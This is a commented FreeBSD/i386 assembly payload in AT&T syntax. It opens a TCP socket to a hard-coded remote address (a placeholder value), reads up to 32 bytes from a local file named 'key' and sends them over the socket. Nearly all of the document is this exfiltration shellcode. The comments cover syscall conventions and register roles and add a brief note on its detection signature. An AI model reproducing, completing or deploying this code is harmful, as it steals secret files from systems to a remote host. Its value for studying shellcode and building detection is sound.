# FreeBSD/i386 payload in GAS AT&T syntax: opens a TCP socket, connects it to a
# hard-coded address, opens the file "key", reads up to 0x20 bytes of it into a
# stack buffer and writes those bytes to the socket.
# Syscall convention used throughout: FreeBSD int 0x80 — arguments pushed
# right-to-left, syscall number in %eax, and one extra dword on top of the
# arguments (the `push %eax` right before each `int $0x80`) standing in for the
# return address a libc wrapper would have left there.
# Register roles: %esi = socket fd (live for the whole function),
# -0x20(%ebp) = 32-byte read buffer, %ecx/%edx = scratch.
# Detection note: the socket -> connect -> open -> read -> write chain with no
# exit syscall is the behavioural signature of this payload.
        .globl main
main:
        push    %ebp
        mov     %esp, %ebp
        sub     $0x20, %esp             # 32-byte local buffer at -0x20(%ebp)
        xor     %eax, %eax
        xor     %ebx, %ebx
        xor     %ecx, %ecx
        xor     %edx, %edx
        push    %ecx                    # protocol = 0
        inc     %ecx
        push    %ecx                    # type = 1 (SOCK_STREAM)
        inc     %ecx
        push    %ecx                    # domain = 2 (AF_INET)
        mov     $0x61, %al              # 97 = socket
        push    %eax                    # dummy return-address slot
        int     $0x80
        mov     %eax, %esi              # %esi = socket fd, kept for write()
# sockaddr_in built on the stack (BSD layout: sin_len, sin_family, sin_port, sin_addr)
        push    $0xGHEFCDAB             # sin_addr; NOTE: not a valid hex immediate as written
        pushw   $0x3412                 # sin_port; stored as bytes 0x12,0x34
        pushw   $0x02AA                 # stored as 0xAA (sin_len) then 0x02 (sin_family = AF_INET)
        mov     %esp, %ebx              # %ebx = &sockaddr_in
# connect
        mov     $0x10, %cl              # %ecx = 16 = sizeof(sockaddr_in); upper bytes of %ecx are already 0
        push    %ecx                    # namelen
        push    %ebx                    # name
        push    %eax                    # s (%eax still holds the socket fd)
        mov     $0x62, %al              # 98 = connect; only %al is rewritten, so this assumes fd < 256
        push    %eax                    # dummy slot
        int     $0x80
        xor     %eax, %eax
        xor     %ebx, %ebx
        xor     %ecx, %ecx
        xor     %edx, %edx
# open
        mov     $0x05, %al              # 5 = open
        # Author's question ("3 bytes but pushw pushes 2"): the path "key" plus
        # its NUL terminator is 4 bytes, so two 16-bit pushes cover it exactly.
        pushw   $0x79                   # "y\0"
        pushw   $0x656B                 # "ke"
        mov     %esp, %ebx              # %ebx = "key"
        push    %ecx                    # flags = 0 (O_RDONLY)
        push    %ebx                    # path
        push    %eax                    # doubles as the dummy slot; no separate push here
        int     $0x80                   # %eax = file fd
# read
        push    $0x20                   # nbytes = 32
        lea     0xffffffe0(%ebp), %ecx  # %ecx = buf = -0x20(%ebp)
        push    %ecx                    # buf
        push    %eax                    # fd from open
        xor     %eax, %eax
        mov     $0x03, %al              # 3 = read
        push    %eax                    # dummy slot
        int     $0x80                   # %eax = bytes read
# write
        mov     %eax, %edx              # nbytes = bytes read
        xor     %eax, %eax
        mov     $0x4, %al               # 4 = write
        mov     %esi, %ebx              # fd = socket
        push    %edx                    # nbytes
        push    %ecx                    # buf (relies on %ecx surviving the read syscall — confirm)
        push    %ebx                    # fd
        push    %eax                    # dummy slot
        int     $0x80
# "exit": no exit syscall is issued — the frame is torn down (which also reclaims
# every argument pushed above) and control returns to main's caller.
        leave
        ret